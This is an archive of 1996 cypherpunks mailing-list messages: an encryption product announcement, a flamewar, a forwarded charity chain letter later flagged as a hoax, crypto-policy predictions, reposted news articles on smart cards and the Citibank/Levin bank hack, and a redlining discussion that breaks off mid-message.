From: Walt Armour <walt@blarg.net>
Date: Thu, 12 Dec 1996 07:07:58 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: !! Point 'n Crypt -- Win95 Privacy for Everyone !!
Message-ID: <01BBE7FB.2D4DC6A0@dialup13.blarg.net>
MIME-Version: 1.0
Content-Type: text/plain


A Windows 95 extension for encrypting files is now available from 
SoundCode, Inc.  Just right-mouse click on any file, provide a passphrase, 
and it's done.  Point 'n Crypt visually indicates that a file is encrypted, 
and optionally provides the encryptor's name for easy passphrase lookup. 
 Point 'n Crypt is FREE during the beta period (through 12/31/1996) and 
will list for $19.95.

Point 'n Crypt uses 40-bit DES-CBC (exportable), salted SHA passphrases, 
and conforms to PKCS #5 and PKCS #7.

For more info, check out www.soundcode.com/pointNcrypt.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 12 Dec 1996 07:29:51 -0800 (PST)
To: Bovine Remailer <haystack@cow.net>
Subject: Re:
In-Reply-To: <9612120519.AA20735@cow.net>
Message-ID: <32B0241F.7EE1@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Bovine Remailer wrote:
> >Anonymous wrote:
> >> Dale Thorn sez:[snippo]
> >> The innovation you are looking for is
> >> called "the loop". You can implement "the loop" many ways including
> >> taping the end of your program to the beginning.
> >> Remind me not to use any of Dale's "utilities".

> >You would not likely ever have the opportunity to use such utilities,
> >since you obviously lack certain basic ingredients of intelligence.
> >I don't do "user-friendly" GUI programs, but [snip]

> Ahh come on Dale. Lay one one us! Are you now writing
> "utilities" in portable batch files? I'd love to see one.
> Or are you a bare metal guy typing in hex codes in debug?
> btw, how do you like Win95? Too user-friendly for you?

Nothing inherently wrong with a GUI if:
1. It doesn't make it much more difficult to do operations which are
   inherently more efficient from a command line, -and-
2. It doesn't make the computer unacceptably buggy and/or slow, -and-
3. It doesn't make the existing software base unnecessarily obsolete...

The representative article on #1 is in Info World a few weeks ago, as
I recall.  There are a slew of useful DOS operations that are very
difficult (and some impossible) through the Win95 interface, but I'm
sure you already knew that.

I've been of the opinion that Win95 is more stable than Win3.x, since
it has its own memory management, but that assumes that any new software
for Win95 you load up isn't buggy...

On #3, I'm sure you are aware that there are plenty of people around who
have "power" in this PC industry, who would like to *remove* some of the
current user options from PC's in general, for instance, the DOS command
line.  Telling users "if you don't like it, buy something else" is
analogous to telling a person "if you don't like the way our government
and their team of lawyers is destroying your country, go somewhere else".

My utilities are a collection of Basic and 'C' code, somewhat modularized,
so that a new utility can be quickly pasted together from existing
routines, with minimal unique code (or as minimal as possible).

My knowledge of the underlying processes in these languages (on a PC,
anyway) is sufficient for me to be able to quickly analyze bottlenecks
and other areas of code where routines in assembler, etc. can be substi-
tuted for better performance or whatever.

This is very basic stuff for PC "experts", of course, but lots of folks
don't know and (tragically) don't care, particularly about the removal
of current user options from the systems.  When you operate a Mac, for
example, and you are used to not having certain options, you just don't
care, right?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com
Date: Thu, 12 Dec 1996 04:46:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: (Fwd) Books for Children's Hospitals
Message-ID: <199612121245.HAA21446@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


i know that this is WAY off topic, and that we never post off-topic mail here,
but, this seems worthwhile, so please excuse, (maybe flames for off-topic posts
will count )

cheers,
	-paul

----- Begin Included Message -----

>From jhill@fir.fbc.com Wed Dec 11 07:49:57 1996
From: "Jean Hill" <jhill@fir.fbc.com>
Date: Wed, 11 Dec 1996 07:49:16 -0500
Reply-To: jhill@fir.fbc.com
X-Mailer: Z-Mail (3.2.1 10oct95)
To: nnyeim@ny.ubs.com, bhill@bis.adp.com, julie.maxwell@gs.com,
        mgreen@morgan.com, nnysak@ny.ubs.com, pjb@ny.ubs.com
Subject: (Fwd) Books for Children's Hospitals
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Length: 701

Guys,

Please pass on, great holiday gift.
--- Forwarded mail from CU-Alum-L@cornell.edu



>
>"The Houghton-Mifflin publishing co. is giving books to children's
>hospitals; how many books they give depends on how many emails they
>receive from people around the world.  for every 25 emails they receive,
>they give one book--it seems like a great way to help a good cause.
>
>All that you have to do is email share@hmco.com.
>
>I hope that you can spare the seconds...and let your friends know.  So far
>they only have 3,401 messages...last year they reached 23,000.
>
>This seems like an easy and simple thing to do -- please take the time!"
>



---End of forwarded mail from CU-Alum-L@cornell.edu


----- End Included Message -----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Thu, 12 Dec 1996 01:02:15 -0800 (PST)
To: Lucky Green <cypherpunks@toad.com>
Subject: Re: Lucky's Official Prediction (raising the ante)
In-Reply-To: <3.0.32.19961211192429.006a5f14@netcom14.netcom.com>
Message-ID: <199612120903.CAA25493@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <3.0.32.19961211192429.006a5f14@netcom14.netcom.com>, on 12/11/96 
   at 07:25 PM, Lucky Green <shamrock@netcom.com> said:

::<bold>Official Prediction</bold> (For new readers of this list, once in a
::while I make an "official prediction". That means the reader is urged to call
::me on it and, yes, I take bets):
::
::<bold>The US will make the following acts illegal and or subject to licensing
::within two years:
::
::</bold>1. Production of strong crypto for sale abroad by a subsidiary of a US
::corporation.
::
::2. Production of strong crypto for sale abroad, if the project is financed by
::a US corporation. Alternatively, US companies might be prohibited to
::financially benefit from such a product.
::
::I am not saying that these acts will be prohibited in all cases. I am saying
::that they will be prohibited in some cases.
::
        based on information, and direct experience in some "things." 
    I'll raise the ante on <bold>official prediction</bold> one more:

        within two years, Bubba and friends will successfully both:

        a)  destroy the Bill of Rights

        b)  either ban the use of strong crypto or require full real-time
            GAK access --and the law will make the use of non-approved
            crypto a federal felony.

    the first USSC justice who retires (Renquist?) or dies (..?) --the
    precariously rights balance on the Court goes to Bubba.

- --
  Now, with a black jack mule you wish to harness, you walk up, 
  look him in the eye, and hit him with a 2X4 over the left eye.   
  If he blinks, hit him over the right eye! He'll cooperate.  
        --so will politicians.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMq/JrL04kQrCC2kFAQGNiwP+JuTM6gvfrmnV6U625BLihhNeOrYPSgfs
FNFIAl7xGpxRhE4ReaxnIbSuEM4lYpSyBU03kpedGkvYn0LStmoSKYaF9HOsdcsX
OVFMHNv8RD4eQ2ORV9eigyFz1gaZ4WblE7ZMCnip9QgKNK7/vQ/7Icpl9v2Woi0t
9VBHTrFW4k8=
=PnC2
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Thu, 12 Dec 1996 09:09:09 -0800 (PST)
To: pjb@ny.ubs.com
Subject: [Incredibly Off-topic] Re: (Fwd) Books for Children's Hospitals
Message-ID: <3.0.1.32.19961212090614.0120a2e4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:45 AM 12/12/96 -0500, pjb@ny.ubs.com wrote:
>i know that this is WAY off topic, and that we never post off-topic mail
here,
>but, this seems worthwhile, so please excuse, (maybe flames for off-topic
posts
>will count )

[Mail bomb Hough Miflon spam deleted]

Sorry.  This was true one.  Evidently it blew up their mail server.  (As it
should.  Damn stupid idea.)  Unfortunatly the Shergold Effect will keep it
in propagation for centuries...

---
|        "Spam is the Devil's toothpaste!" - stuart@teleport.com         |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alzheimer@juno.com (Ronald Raygun Remailer)
Date: Thu, 12 Dec 1996 06:11:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: Copyright violations
Message-ID: <19961212.081120.8575.0.alzheimer@juno.com>
MIME-Version: 1.0
Content-Type: text/plain



Mondex USA Partners Look to Ambitious '97 Tests
 
By VALERIE BLOCK 
 
The seven owners of Mondex USA have ambitious plans for 1997. 
 
Wells Fargo & Co. and AT&T Universal Card Services -- the two original 
stakeholders and now
owners of 30% and 10%, respectively, of the smart card system -- are
furthest 
along. Wells has issued
800 cards to employees; AT&T, 200; and both plan to expand the pilots
next year.
 
 
Chase Manhattan Corp., with a 20% stake in Mondex USA, had planned to
begin 
testing MasterCard
Cash on New York's Upper West Side by March, but its switch to Mondex
will 
force a delay until the
fourth quarter. 
 
Even so, Janet Hartung Crane, president and chief executive of the joint 
venture, said, "In 1998, we will
roll out" nationally. 
 
Chase's pilot, with 50,000 cards and more than 500 merchants, would be by
far 
the biggest. 
 
Speaking last week at the Bank Administration Institute's Retail Delivery
'96 
Conference, where
Mondex USA was officially unveiled, Ms. Crane, a Wells Fargo senior vice 
president, said Wells

would expand its San Francisco headquarters pilot in 1997. The bank also
plans 
to test card usage on
the Internet, look for a cobranding partner, and install the technology
on a 
university campus. 
 
AT&T senior vice president Keith Kendrick said he expects to expand the
test at 
his Jacksonville, Fla.,
headquarters in the second quarter, along with an Internet pilot, taking 
advantage of Mondex's ability to
download value via smart phones. 
 
First Chicago NBD Corp., another 10% owner, will begin testing in the
third or 
fourth quarter with 200
headquarters employees and 12 merchants. 
 
Dean Witter, Discover & Co. is "still formulating its plans," said
William 
Simmons, executive vice
president of its Novus Services unit. It is looking to get its feet wet
on a 
university or corporate campus.
 
Ironically, Discover is now in bed with MasterCard -- prospective
majority 
owner of Mondex
International as well as 10% owner of Mondex USA -- despite Discover's
thorny 
relationship with
banks. John R. Mannion, a Novus director, noted that all the Mondex USA 
partners are fierce
competitors. 
 
Michigan National Bank -- owned by National Australia Bank, a Mondex
global 
founder -- is planning
a test at its headquarters beginning in late spring with a fraction of
its 3,
000 employees. 
 
Still, winning over merchants and, thus, consumers may be difficult in
the 
United States. The
high-quality, low-cost telecommunications infrastructure that underpins 
magnetic-stripe card systems
weakens the case for a costly conversion of point of sale terminals to
smart 
cards. 
 
At a BAI seminar just after the Mondex announcement, where Michael J.
Shade, 
vice president of
Verifone Inc., and Fred J. Stephens, manager of technology for Shell Oil
Co., 
discussed the migration
to smart cards, one observer called them "a solution looking for a
problem." 
 
Mr. Stephens said the investment, close to $60 million for his company,
is hard 
to justify. While card
executives argue that chip cards reduce cash-handling costs and
transaction 
times, Mr. Stephens said it
might require reduced interchange fees, personal identification numbers
on 
credit cards to reduce fraud,
and cost-sharing to tip the scales in smart cards' favor. 
 
Other types of merchants will have other high-priced demands. 
 
Visa U.S.A. and its partners in the Visa Cash rollout in Atlanta shared
the 
lessons they had learned at
the conference. Michael Love, a First Union Corp. vice president, said 
merchants are "interested in
sales lift." 
 
As for the business case, "stored value can ride the railroad, but it
will not 
pay for it," said Richard F.
Shaffner, executive vice president at NationsBank Corp. 
 

Guardian (Manchester): Saturday, December 7, 1996
 
Surfing Superhighwaymen
 
By David Gow And Richard Norton-Taylor 
 
Carlos Arario, head trader at the Argentinian firm, Invest Capital,
picked up 
the phone and called
company director, Roberto Barbosa. "You had better get down here," he
said, 
"we've been raided."
Barbosa stared with horror and disbelief at his screen in his Buenos
Aires 
office. Some $ 200,000 had
disappeared from his firm's account with Citibank, one of the world's
biggest 
banks, overnight. 
 
"We were very, very surprised when we opened the cash management account.
There 
were four wire
transfers made out of that account without our authorisation and
anonymously 
sent to four unknown
destinations." 
 
Barbosa alerted Citibank executives at 111 Wall Street, New York. That
was 
August 1994. For the
rest of the year, Citibank's anxiety made its Argentine client's problems

appear minor as its executives
watched in panic while nearly 20 of their accounts - worth about $ 10
million - 
were plundered. 
 
Citibank's marketing department proudly offers the transfer of funds in
any 
currency straight into a
client's account "quickly, easily and cost-effectively" as part of its
"wide 
range of international banking
facilities". But the world's fifth-largest bank appeared to have been
hoist by 
its own petard. 
 
A hastily-assembled "war-room" on Wall Street watched impotently as its 
clients' money flowed quickly
and easily, and at no cost, into accounts in California, Latin America,
Finland,
 Israel, and the
Netherlands. 
 
According to US court indictments, Citibank accounts held by Indonesia's
Bank 
Artha Graha,
Argentina's Banco del Sud, and Invest Capital SA, were raided with tens
of 
thousands of dollars
assigned to accounts set up elsewhere. 
 
Citibank's war-room began a global detective hunt as they realised their
bank 
was in danger of
acquiring a new image as victim of the world's first grand larceny via 
cyberspace. Others who have
hacked into computerised cash transfer systems were insiders. The hit on 
Citibank is presented in the
US as an outside job.
 
Superhighway Robbery, an Equinox programme to be broadcast on Channel 4 
tomorrow night,

suggests it was perpetrated by the Russian mafia exploiting the poverty
and 
disenchantment of
high-flying technocrats under post-Soviet capitalism. 
 
At the centre of a continuing Citibank-FBI investigation is Vladimir
Levin, a 
29-year-old Russian
computer programmer and former biotechnology student from St Petersburg.
He is 
accused by the US
authorities of being the person who hacked into the bank's computers and 
carried out the attempted
multi-million-dollar fraud from a laptop at the St Petersburg offices of
AO 
Saturn. 
 
That is a shabby software and accountancy firm run by a group of
mathematicians 
and scientists who
were losing out on the Croesus-like wealth enjoyed by the entrepreneurial

Russian nomenklatura and
criminal elite. 
 
"The salary at the Institute (St Petersburg's Technological Institute) I
was 
receiving was very low and I
was too ashamed to ask for money from my parents," says Levin in an
exclusive 
interview. Computers,
he says, were "one of the symbols of perestroika. Unfortunately, since 
perestroika there was so little
money being given to research and science a lot of scientists left Russia
and 
went to other countries
where money was more available." 
 
Citibank's war-room traced an unauthorised money transfer -- allegedly
the 
result of Levin's hacking --
to banks in Switzerland and St Petersburg. But the saga did not end
there.
 
Evgueni Korolkov -- a Russian who moved to the US for a better life --
set up 
two Californian
companies, Shore Co and Primorye. His wife, Ekaterina Korolkova, opened 
personal accounts at the
San Francisco branches of the Sumitomo, Pacific Union, Great Western, and
Wells 
Fargo banks as a
conduit for cash from unauthorised Citibank transfers. 
 
In August 1994, Ekaterina Korolkova was arrested by FBI agents as she
tried to 
withdraw stolen
money from one of her accounts which, they had discovered, was the
destination 
of some of the
Argentinian money. 
 
She agreed to co-operate with the FBI who persuaded her to enlist her
husband, 
a former employee of
AO Saturn, to help track down the perpetrators. The FBI told him they
would 
treat him and his wife
leniently if he played ball and gave the name of the hacker. He pointed
the 
finger at Levin.
 
Desperate to find hard evidence linking Levin to the crime, the FBI also 
contacted the Russian police.
An official St Petersburg Special Branch video of what it claims to be
the 
contents of AO Saturn's
office shows computers, guns and Levin's passport. 
 
Meanwhile, Russian mules -- charged with picking up stolen money from
foreign 
accounts -- were
arrested elsewhere as Citibank managed to recover a little over half the
$ 10 
million loss it initially
feared. 
 
Among them was Vladimir Voronin, who was arrested in the Netherlands
where he 
was about to
collect $ 1 million from Rotterdam's ABN AMRO bank. "It was not because I
liked 
to do it, I had to
do it," he says. He was extradited to the US where he pleaded guilty; in
return 
he agreed go cooperate
with the investigation. 
 
Tomorrow night's programme reveals that, around a year before the alleged
Levin 
conspiracy was
plotted, another hacker -- known only as Megazoid -- was the first
Russian to 
break into Citibank's
computers. 
 
Megazoid, a mathematical wizard obsessed with computers, remains
anonymous for 
fear of criminal
gangs anxious to acquire his skills, which he claims enabled him to
navigate 
the Citibank network
undetected for months, penetrating secret files, using a computer and
modem he 
bought for $ 10 and a
bottle of vodka. 
 
But he also claims to know the origin of the attempted $ 10
million-dollar scam.
 Megazoid, it is alleged,

did not work alone. One of his fellow hackers, a regular surfer on the
Internet,
 got drunk and depressed
one night -- and sold the secrets of how to break into Citibank for $ 100
and 
two bottles of vodka. 
 
The buyers are said to be the mafia who allegedly used AO Saturn and,
claims 
Janet Reno, the US
Attorney General, in a formal extradition request, Vladimir Levin. On
March 3 
last year, Levin was
arrested at Stansted airport. Levin, who proclaims his innocence, has
spent the 
past 21 months in
Brixton prison, and yesterday he won a provisional right to appeal to the
House 
of Lords against
extradition to the US. 
 
He has told his lawyers, who are seeking his return to Russia: "I have
never 
committed any crimes and I
do not wish to be sent to America, a country to which I have never been,
where 
I have no home, no
relatives, no friends and no money with which to defend myself. I
consider my 
detention here in England
to be both illegal and a breach of human rights." 
 
The significance of the alleged conspiracy, with some of the players
tried and 
convicted, some released,
others on the run and yet more unknown, goes beyond the issue prompted by

Megazoid's "career". It
highlights the vulnerability of financial institutions' computer systems.

 
Mike McKenna, former Citibank vice-president in charge of technology,
talks 
openly of "years of
neglect" during which the bank amassed 10,000 employees in technological 
services, 1,500 consultants,
and, most tellingly of all, 3,400 subsidiaries in almost 100 countries.
And, he 
relates, virtually each
daughter-firm, certainly each country, had its own protocol for accessing
the 
network.
 
Five years ago there were 200 home-grown protocols, what he describes as
"an 
orchestra with many
people with different violins playing different tunes", rather than a 
full-scale symphony in which strings,
horns and percussion talk to each other. 
 
The Bank for International Settlements, Bank of England, and Bundesbank
have 
recently issued
warnings about the threat posed by electronic money and open-access 
computer-networks like the
Internet bulletin boards. There is even talk of "off-planet" banking --
banks 
on Saturn and Jupiter
reached by satellite. 
 
"These transfers can take place from anywhere," Dietrich Snell, a New
York 
attorney told one of the
many US court hearings on the Levin case. "You have the right user ID and
the 
right password and the
right computer equipment, the hardware, and so long as you know what
you're 
doing on the computer,
you can get into the system literally anywhere." 
 
Says Bill Marlow, a banking security consultant: "Let's put it in
perspective - 
the average bank robbery
nets you $ 1,900, gets prosecuted 82 per cent of the time and you could
get 
shot. With a computer you
see $ 250,000 and get prosecuted less than 2 per cent of the time . . .
these 
figures are staggering. It's
safer to go and buy a computer than a gun." 
 
Citibank said in a statement last night that it had lost less than $
400,000 in 
the scam. "No customers
have lost any money," it said, adding that the accounts that were hacked
into 
were not encoded. 
 
It has installed an access control system, Des-cards, which uses
passwords 
altered after each time they
are used. "Citibank," the statement said, "is a leader in the financial 
services industry in fraud
prevention."
 

 
American Banker: Tuesday, December 10, 1996
 
Microsoft Shows It's Catching On and Catching Up 
 
By DREW CLARK 
 
A year after chairman Bill Gates set out to mend fences with the banking 
community, Microsoft Corp.'s
transformation into a bank ally looked virtually complete at last week's
Retail 
Delivery conference. 
 
Through product giveaways, educational efforts, and old-fashioned public 
relations, Microsoft
established its bona fides more convincingly than ever at the Bank 
Administration Institute conference. 
 
And there was evidence that Microsoft is gaining where it really counts
-- in 
the marketplace -through
growth in such areas as the NT operating system and Money personal
finance 
software. Microsoft
Money appears to be making up ground in the business dominated by Intuit
Inc.'s 
Quicken. One
indication was a survey of personal-computer users by Atlanta-based 
Synergistics Research Corp.,
showing 13% use Money. Quicken still had a commanding 59%. 
 
There was additional, anecdotal evidence of Money's gains. In the three
weeks 
that Community Credit
Union in Plano, Tex., has been offering both Money and Quicken, Money 
downloaders are
outnumbering Quicken users two-to- one. 
 
Through some partner companies, Microsoft also showed how its computer
language,
 Active-X, could
be used to get bank Web pages to function like personal financial
software 
managers. 
 
"The Internet provides the opportunity to do exactly what financial 
institutions have wanted to do for a
long time - to get customers to go directly to them," said Lewis Levin,
general 
manager of Microsoft's
desktop finance division. 
 
"We live and breathe the Web," added Money product manager Matthew Cone.
"Bill 
(Gates) outlined
the vision" at last year's Retail Delivery conference, he said. "This
year, 
Microsoft is helping banks build
on the Web." 
 
Last year's remarks by Mr. Gates came only months after bankers
interpreted 
Microsoft's attempted
acquisition of Intuit as a threat. Mr. Gates apologized for what he said
was a 
quotation taken out of
context -- that banks are dinosaurs -- and proceeded to say Microsoft is 
bankers' friend. 
 

This year, banks are buying Windows NT over its competitors by a 6-to-1
margin, 
Microsoft officials
said. When demonstrating Internet-related products last week, vendors 
invariably used Microsoft's
Internet browser, Explorer. And Microsoft placed booths throughout the
Dallas 
convention center
providing unlimited access to the Internet -- through Explorer, of
course. 
 
To be sure, Microsoft still faces stiff competition in many areas,
including 
its attempt to set financial data
standards with the Open Financial Connectivity protocol it unveiled in
March. 
 
Others looking to establish similar standards include the Integrion
Financial 
Network (Gold), Visa
Interactive (Access Device Messaging Standard), and Intuit (Open
Exchange). 
 
Representatives from Integrion, Microsoft, and Intuit appeared on stage
with 
panelists from Checkfree
Corp. and Security First Technologies in a session dubbed "The Great
Debate." 
The participants
generally agreed that their respective standards needed to become 
interchangeable for on-line
consumers to be best served. 
 
Some questioned whether Microsoft was geared for such a cooperative
effort. In 
last Wednesday's
conference-opening speech, Sun Microsystems Inc. chief executive officer
Scott 
McNealy mocked Mr.
Gates as Big Brother. 
 
Mr. McNealy touted Sun's Java computer language, citing its ability to
operate 
with a wide variety of
computer platforms, including Microsoft Windows, Apple Macintosh, and
Unix. 
 
But in the exhibition booths, more systems were written in Active-X than
in 
Java. 
 
Microsoft collaborators -- such as Vertigo Development Corp., Checkfree
Corp., 
Block Financial
Corp., and Ultradata Corp. -- are using Active-X to develop what they
promise 
will be the next
generation of banking Web sites. 
 
But there were signs that the combat is far from over. 
 
During the debate, an audience member asked the panelists which
electronic 
banking technology each
uses.
 
Security First Technologies chief executive officer Michael McChesney
said he 
uses a sister company,
Security First Network Bank. Microsoft's Mr. Levin said he uses Money. 
 
But Quicken still took 60%: Intuit executive vice president William H.
Harris, 
Checkfree's Ken
Benvenuto, and Integrion's William M. Fenimore Jr. 
 
"We use Quicken, and it has improved our quality of life," said Mr.
Fenimore.
 
 

Financial Times: Tuesday, December 10, 1996
 
New Smart Card to Be Tried in Russia 
 
By George Graham
 
LONDON -- Russian bank customers will be the guinea pigs next year for a
new type of smart payment card that could become the standard for
emerging markets with inadequate phone networks and weak payments
systems. 
 
The new Visa card uses a built-in microchip to provide verification in
shops
and outlets where telephone authorisation is impossible or too expensive.
Unlike so-called electronic purses, however, the card is loaded not with
money but with a credit limit. 
 
Trials will begin in the second quarter of next year by Inkombank, one of
Russia's largest commercial banks. Sberbank, which has already issued
some
smart cards, is also expected to transfer to the pre-authorised system. 
 
Ms Anne Cobb, Visa International's president for central and eastern
Europe, the Middle East and Africa, said the card provided a way round
the
infrastructure problems in many countries such as Russia. "If we succeed
in
Russia, then we will have proved this is the product we need in emerging
markets," she said. 
 
The card is based on technology developed in South Africa, which, like
Russia, has gaps in its telecoms infrastructure. 
 
Banks in many countries with still evolving financial systems are often
reluctant to issue credit cards, because they do not have enough data on
their
customers' creditworthiness to judge the risks accurately. But debit
cards
only work if the telephone network is extensive and cheap enough to allow
every transaction to be authorised by the bank's central computer. 
 
For small transactions, Visa and its rival MasterCard, along with a
number of
national payments groups, are developing electronic purses such as the
Mondex card. These are loaded with money from a bank account and used
instead of cash in shops or machines. But customers are reluctant to load
large sums on to them because in many cases they distrust the banks and
because if they lose the card they lose the money. 
 
The new Chip Off-Line Pre-Authorised Card system to be launched by Visa
in Russia is a close cousin of the electronic purse. However, the bank is
safe,
because it holds the money customers have loaded on to their cards, and
customers are safe, because they can still get that money back if they
lose the
card. 
 
Spending limits and personal code numbers are held on the card's
microchip,
so they can be checked by retailers without a telephone call to a bank
computer. 
 

 
Washington Post: Monday, December 9, 1996
 
Transaction Network Services
 
Faster Than a Speeding Cashier . . . 
 
By David S. Hilzenrath 
 
If you use a credit card reader in the self-service lane at the gas
station,
there's a good chance a Reston company called Transaction Network
Services Inc. is helping to speed you on your way. 
 
Though it's virtually invisible to consumers and retailers alike,
Transaction
Network Services and companies like it have changed the way people buy
things like a tank of gasoline, a bag of groceries or a movie ticket. 
 
The company provides a telecommunications network of leased lines that
link
the credit card terminal to companies that process credit card
transactions
for banks and other card issuers. By cutting the time and cost required
to
authorize these transactions electronically, Transaction Network Services
and its competitors have helped make plastic the coin of many realms
where
paper once reigned supreme. 
 
"What we've managed to do is reduce the time of a credit card transaction
to

about the same amount of time it would take the cashier to do a cash
transaction," spokesman Karen Kazmark said. 
 
Transaction Network Services claims that it is biggest and fastest in the
business, but company officials concede that they know of no
authoritative
data to prove so. This niche accounts for such a small percentage of
revenue
for rivals Sprint Corp. and AT&T Corp. that they disclose few if any
details
about it. 
 
At the company's largest client, First Data Corp., Vice President George
Barby said he has not made a scientific comparison of different carriers'
transaction speeds. In terms of reliability, "they're all relatively
similar," 
Barby
said. 
 
"I believe that in any given situation . . . that we're going to be as
fast and 
as
market competitive as any of the providers," said Bart Westberg, director
of
enterprise services for Sprint. 
 
It's a business in which price competition is measured in fractions of a
penny:
The company's average fee -- paid by the credit card processors -- was
about 1.77 cents per transaction during the last quarter, down from 2.3
cents
per transaction last year. But it all adds up. Transaction Network
Services
handles about 5.7 million transactions a day. 
 
The company, launched in 1990, capitalized on founder and chief executive
John McDonnell Jr.'s idea of using a special type of local telephone
service
to connect to his network instead of the toll-free 800 lines that were
widely
used. Along with other innovations, McDonnell's approach cut transaction
times by about half, to 9 or 10 seconds, when it debuted in 1991,
McDonnell said. 
 
Since that time, the company's competitive advantage seems to have
narrowed, as rivals such as ATT and Sprint have used a similar approach
and as technological improvements have speeded up toll-free 800 service. 
 
The company has since diversified by using its network to help authorize
food stamps and Medicaid eligibility in some states that automate those
benefits. It also sees health insurance as a potential growth area as
insurers
increasingly automate their benefits systems, enabling doctors' offices
to
verify patients' coverage on the spot, McDonnell said. 
 
Transaction Network Services has developed a second line of business
combating telephone fraud by checking calling cards against databases
when
people place credit card calls from certain pay phones. The company
completes the check during the brief pause before the call is put
through,
remaining just as invisible to the consumer as it is in the retail arena.

 
But that business has been challenged by the growth of prepaid calling
card
services and other services that use toll-free 800 numbers to "dial
around"
(bypass) Transaction Network Services' traditional clients, the pay phone
operators. The company can't fight the trend, so it plans to join it by
helping
out in those services, McDonnell said. 
 
"We have to become a player in this dial-around business, because that's
where this market's headed," he said. 
 
The company's revenue rose to $41.4 million last year from $11.5 million
in
1993, making it one of the region's fastest-growing companies. Revenue
for
the first nine months of this year was $38.9 million, up 32 percent from
$29.6
million a year earlier. 
 
The company earned $4.2 million during the first nine months of the year,
up
30 percent from $3.3 million during the same period last year. 
 
However, Transaction Network Services sees the increase of its core
business slowing. McDonnell said growth in the volume of merchant
transactions the company handles will likely slow to 25 percent to 35
percent
next year -- faster than the industry as a whole but not as fast as the
50

percent increase the company is logging this year. The company isn't
projecting "any real growth" in the phone fraud control area next year,
he
added. 
 
So McDonnell is looking for fresh pastures to plow. 
 
"We really need to find a new business that we can create a new growth
opportunity," he said. 
 
For expansion, the company is looking overseas, to develop network
business in Europe. And it is also looking to Wall Street. 
 
McDonnell said he hopes to create a new network for brokerage firms and
money managers. The network would help the financial firms exchange
information about trades over data lines instead of by talking on the
phone,
he said. "That's the major domestic thing that we're working on." 
 
Many firms already are automated, but they rely on a patchwork quilt of
networks. "We know that we're not going to just walk in and scoop this
thing
up," McDonnell said. 
 
Christopher Morstatt, a vice president at securities firm Salomon
Brothers
Inc., said Transaction Network Services' best prospect is to capture
firms
that are just automating communication functions rather than the larger
firms
that already are wired, though it could differentiate itself by offering
greater
privacy and security than existing services. 
 
"The reality is that this has been in production . . . for quite a while,
and 
Jack
is certainly new to the effort," Morstatt said. 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 12 Dec 1996 11:57:28 -0800 (PST)
To: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Redlining
In-Reply-To: <01ICWJ1E2BX2AEL2O3@mbcl.rutgers.edu>
Message-ID: <32B03E27.5EF9@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


E. Allen Smith wrote:
> From:   IN%"ichudov@algebra.com" 11-DEC-1996 23:46:57.12
> >I would appreciate if some attorney on this list shed some light on the
> >legal definition of discrimination.

[snip]

> P.S. Please note that we cannot yet tell if the racial differences in
> IQ are environmental or a mixture of environmental and genetic; I
> believe they are purely environmental, but there is about as much
> evidence for this belief as there is for God's existence (something
> I also believe in).

Actually, there is not only good evidence for the environmental argument,
but you can reason it out yourself if you give attention to some things
that don't make it into most discussions on this topic.

Example:  Environment has a profound effect on a person's mind (outlook,
perceptions, attitudes, moods, etc.), and thereby has a significant, if
indirect effect on that person's hormone production (quantity, balance).
Those hormone productions have more effect on the body and brain long-
term than any other influence I can think of.

And believe it or not, in some (perhaps unusual) cases, unexpected
changes in hormone production can happen later in life as well, not
just during the "development" years. And I'm not talking about decreased
production either.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 12 Dec 1996 11:59:59 -0800 (PST)
To: Igor Chudov <ichudov@algebra.com>
Subject: Re: Redlining
In-Reply-To: <199612112328.RAA02505@manifold.algebra.com>
Message-ID: <32B03F2E.4715@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Igor Chudov @ home wrote:
> E. Allen Smith wrote:
> > From: IN%"ichudov@algebra.com" 11-DEC-1996 14:01:18.43
> > >The problem is, people can choose what credit history they want to have
> > >(I can be a saver or a spender, for example), but nobody can change the
> > >color of their skin.
> > >This is central point of the theory why discrimination based on credit
> > >histories is OK, while the discrimination based on race is not.

[snip]

> Do we consider discrimination based on poverty illegitimate?

Note that when only part of the statistical picture is presented, the
result can be misleading:  Mississippi is a much poorer state than
Ohio or Pennsylvania, but also has a much lower crime rate.

[remainder snipped]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 12 Dec 1996 11:58:14 -0800 (PST)
To: "Matthew J. Miszewski" <mjmiski@execpc.com>
Subject: Re: Redlining
In-Reply-To: <3.0.32.19961211222012.00698508@execpc.com>
Message-ID: <32B041C8.49C8@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Matthew J. Miszewski wrote:
> >(Those who don't believe me should get "Love Supreme" by John Coltrane
